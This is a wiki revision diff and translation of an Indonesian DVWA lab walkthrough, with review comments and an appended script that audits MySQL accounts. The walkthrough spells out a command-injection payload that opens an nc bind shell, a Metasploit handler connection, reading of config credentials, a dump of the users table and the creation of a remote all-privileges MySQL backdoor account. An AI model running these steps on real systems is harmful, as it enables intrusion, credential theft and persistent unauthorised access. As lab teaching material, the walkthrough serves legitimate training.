Difference between revisions of "DVWA: Exploit using Metasploit"
Onnowpurbo (talk | contribs) |
(4 intermediate revisions by the same user not shown) | |||
Line 22: | Line 22: | ||
Dimana 192.168.0.100 adalah IP address server DVWA | Dimana 192.168.0.100 adalah IP address server DVWA | ||
+ | |||
+ | Teknik ini akan membuka server pada port 4444 menggunakan NC .... | ||
+ | Ini tempat masuk bagi Metasploit. | ||
==Gunakan metasploit== | ==Gunakan metasploit== | ||
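Review bot: the first added line trails off in "...." and neither added line says on which host the port 4444 listener runs. Suggest finishing the sentence and naming the DVWA server (192.168.0.100 in the context line above) as the machine that is left with the open port, so the reader knows which lab host to keep on an isolated network and to check afterwards.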
Line 55: | Line 58: | ||
Cari password database | Cari password database | ||
− | ls -l /var/www/html/ | + | ls -l /var/www/html/DVWA-1.9/config |
− | cat /var/www/html/ | + | cat /var/www/html/DVWA-1.9/config/config.inc.php |
− | Explorasi database | + | Explorasi database, asumsi username MySQL root, password 123456 |
− | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
− | echo "use dvwa; show tables;" | mysql -uroot - | + | echo "use dvwa; show tables;" | mysql -uroot -p123456 |
− | echo "use dvwa; desc users;" | mysql -uroot - | + | echo "use dvwa; desc users;" | mysql -uroot -p123456 |
− | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Buat user baru | Buat user baru | ||
− | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot - | + | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456 |
− | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Lihat informasi tabel MySQL | Lihat informasi tabel MySQL | ||
− | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
− | echo "use mysql; show tables;" | mysql -uroot - | + | echo "use mysql; show tables;" | mysql -uroot -p123456 |
+ | |||
+ | Ini bagian paling berbahaya, buat user MySQL yang baru | ||
+ | |||
+ | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 | ||
+ | echo "select * from mysql.user;" | mysql -uroot -p123456 | ||
+ | |||
+ | Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( .. | ||
− | + | ==Cek dari console Kali Linux== | |
− | + | mysql -u db_hacker -h 192.168.0.100 -pabc123 | |
− | + | show databases; | |
+ | quit | ||
==Referensi== | ==Referensi== | ||
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | * https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html |
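Review bot: the added `GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' ... WITH GRANT OPTION` step, like the `insert into dvwa.users` step before it, has no matching cleanup, so a lab server that follows the page keeps a remotely reachable administrative account with password abc123. Suggest adding a closing step that drops db_hacker and deletes the jgray row. The "asumsi username MySQL root, password 123456" remark would also read better next to the `cat /var/www/html/DVWA-1.9/config/config.inc.php` line, since that is the step under "Cari password database" where the reader obtains the credentials.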
Latest revision as of 04:18, 4 May 2017
Source: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Preparation
Log in to DVWA, for example
http://192.168.0.80/DVWA-1.9
username admin password password
Click
DVWA Security > Security Level Low > Submit
Prepare NetCat
Go to DVWA Command Injection and enter
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
where 192.168.0.100 is the IP address of the DVWA server.
This technique opens a server on port 4444 using nc. This is the entry point for Metasploit.
Use Metasploit
Run
msfconsole thankyou
Enter
use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit
Check password
whoami
grep www-data /etc/passwd
grep www-data /etc/group
Check the password via the web configuration
ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*
Find the database password
ls -l /var/www/html/DVWA-1.9/config
cat /var/www/html/DVWA-1.9/config/config.inc.php
Explore the database, assuming MySQL username root, password 123456
echo "show databases;" | mysql -uroot -p123456
echo "use dvwa; show tables;" | mysql -uroot -p123456
echo "use dvwa; desc users;" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456
Create a new user
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456
echo "select * from dvwa.users;" | mysql -uroot -p123456
View MySQL table information
echo "show databases;" | mysql -uroot -p123456
echo "use mysql; show tables;" | mysql -uroot -p123456
This is the most dangerous part: create a new MySQL user
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456
echo "select * from mysql.user;" | mysql -uroot -p123456
The command above creates the MySQL user db_hacker, which can connect from anywhere (%), with password abc123 :( ..
Check from the Kali Linux console
mysql -u db_hacker -h 192.168.0.100 -pabc123
show databases;
quit
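
The account created in the "most dangerous part" above is visible from the defender's side in mysql.user. The script below is an added example, not part of the original page: it flags accounts that combine a wildcard host with global administrative rights. The allow-list, function names and sample rows are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit MySQL accounts for the pattern the walkthrough creates,
# a '%' host combined with global GRANT OPTION / SUPER.
#
# Input: tab-separated rows "User<TAB>Host<TAB>Grant_priv<TAB>Super_priv",
# as produced on a live server by:
#   mysql -N -B -e "SELECT User, Host, Grant_priv, Super_priv FROM mysql.user"

# Hypothetical allow-list of accounts expected to hold admin rights.
ALLOWED_ADMINS="root@localhost"

flag_risky_accounts() {
    awk -F '\t' -v allowed="$ALLOWED_ADMINS" '
        BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        NF < 4 { next }                    # skip malformed rows
        {
            acct = $1 "@" $2
            if (acct in ok) next           # expected admin account
            wildcard = ($2 ~ /%/)          # % in Host matches any client address
            admin = ($3 == "Y" || $4 == "Y")
            if (wildcard && admin) print "HIGH\t" acct "\tremote admin account"
            else if (admin)        print "MEDIUM\t" acct "\tunexpected admin account"
            else if (wildcard)     print "LOW\t" acct "\treachable from any matching host"
        }'
}

# Constructed sample rows (not real server output).
sample_rows() {
    printf 'root\tlocalhost\tY\tY\n'
    printf 'dvwa\tlocalhost\tN\tN\n'
    printf 'db_hacker\t%%\tY\tY\n'
    printf 'report\t192.168.0.%%\tN\tN\n'
}

sample_rows | flag_risky_accounts
```

On a real server, pipe the output of the `mysql -N -B` query in the header comment into `flag_risky_accounts` instead of `sample_rows`.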